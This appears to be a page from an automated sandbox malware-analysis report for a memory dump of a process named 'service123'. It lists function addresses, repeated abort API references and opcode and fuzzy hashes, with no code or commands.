Instruction Fuzzy Hash: 45011A71A082818FC385DF3D848152ABBF46B6B204F49D95AE888C7316E236C816DB67

Function 6C9ED504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: 2c8259ab3410828689f4a0fdfdaea4061f4668d96d5d0a5d306e442e98b645ac
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: CA0171B2A052019BDB04DF29C88476AFBE8FF99248F50C56DD848CB705D731D985CBD2

Function 6CA94360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: accde56c308bfa2a3cbc6a969f4b56b8d7d8b76ce483afcb2e5ee9cafee21429
Instruction ID: 4bb9307bf626f5287c392698a79517419fddec5d39e57e596be1df8f64ad2a11
Opcode Fuzzy Hash: accde56c308bfa2a3cbc6a969f4b56b8d7d8b76ce483afcb2e5ee9cafee21429
Instruction Fuzzy Hash: 2FF01D36B142819F8780EF3CC54252AB7F0A75A218F88D958E818C7702F635D4558BA7

Function 6CA1A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec905bb3a20433bbf3763e639d5c32a49653835758340e88674b074f45bca25b
Instruction ID: d7cecb57b786f47f92100f02f97c19d113c2e19b9790be8982fd7923e45e71fc
Opcode Fuzzy Hash: ec905bb3a20433bbf3763e639d5c32a49653835758340e88674b074f45bca25b
Instruction Fuzzy Hash: AFD01271E041409F8B40EE2CC640816B7B0AB5A204F54D944E40897706E232D8078F9A

Function 6C9ED974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: 42f3abf5b5d87772ff12830b976b0534c685b9de098cc3f41573bf28d7f9b8ef
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 9EC012729451005FCF00EF34C1C0078F6F1AF96288F125458C0C4D7700E771C845C786

Function 6C9ED674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 81e663e5ce0a8609a0a8d6e5b5efd01cb3afa6f1382e2384eb5cfe16b8e46156
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 2AC0C9729451004BCF40EF248080078B2F1AB96288F125858C08497700E730D8468646

Function 6C9ED7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 3f47e298cff64ab30be8a74a9fd728bc24032db1289b656d013ea63926cfb649
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: CAC0C9729451048BDF00EF28C080578B2F0AB96288F122458C084D7700E730C885C646

Function 6C9DB1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 3ec5e9cc484d1027c17ef10ec35785fa508b4997fccf4c5775200b5913f17423
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 96C012B0C062408BC600BF388A0A238BAB0BB42208F8428ACD58413301E739C05C965B

Function 6C9CBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Strings

@, xrefs: 6C9CBAB1

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: fa8d58190e24b714a2d79eca50f4cb12566a687985fdc6bcac9a9eb7446ffb6c
Instruction ID: 96f0902aeb54de49228100ab1d957ae0083fd1183cb2d13bcd656a8a5bdc3286
Opcode Fuzzy Hash: fa8d58190e24b714a2d79eca50f4cb12566a687985fdc6bcac9a9eb7446ffb6c
Instruction Fuzzy Hash: 24B1353270932A8FD3108E2CC491759B7FAAF89318F498569D8A497B95C735E848CBC3

Function 6C9C2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a146e6f8a24c90d9c6021286be5000445adde6ba35f6c8e230e7f758bba383d5
Instruction ID: 8a048fee1382856dee905661645c8818d864a9f8a86de86fc1bb4ab064c17462
Opcode Fuzzy Hash: a146e6f8a24c90d9c6021286be5000445adde6ba35f6c8e230e7f758bba383d5
Instruction Fuzzy Hash: 5DC1DF71704A018FD704CF29C48435AB7E2BF55348F15AA69D8A8CFB45DB39E90ACB93

Function 6C9CB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1c6cd681ca90d21fd7519138f2fe26aefe5e87c1f295827219692ac22cd929
Instruction ID: d62882afe0c7841637b7b15a3a07af046c04e7320f6f172e5b6fa17153ec30e4
Opcode Fuzzy Hash: da1c6cd681ca90d21fd7519138f2fe26aefe5e87c1f295827219692ac22cd929
Instruction Fuzzy Hash: 7F41C071A093959FE710CE29C0C0716BBF4AF8A728F18899DDD958BB82C335E855C783

Function 6C9C28FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 790b1b1d33896d0844f3c90846b7bb17beb18f731311312a11076f4d6ea3aea8
Instruction ID: 6c73e75222b17969b2aa4fc4c1ef6a915c7184f316223852d646affff8698330
Opcode Fuzzy Hash: 790b1b1d33896d0844f3c90846b7bb17beb18f731311312a11076f4d6ea3aea8
Instruction Fuzzy Hash: 691190B2642601CBE708FF1CE892B56B7B0FB21349F019A48D194DBB11D739E858CB91

Function 6C9C2A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4bca3a5a1c79193e9b0d6e56361a7ed0cfb429f2f04aaa5ff302956d0506c8d0
Instruction ID: 347abf621f63eb9957aa0982622cedba023a6f7ba9512d5b09557b42cefc8bbd
Opcode Fuzzy Hash: 4bca3a5a1c79193e9b0d6e56361a7ed0cfb429f2f04aaa5ff302956d0506c8d0
Instruction Fuzzy Hash: 9211A2B2652601CBE708FF1CE892B55B7B0FB21309F019A48D194DBB11D739E85CCB91

Function 6C9C29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
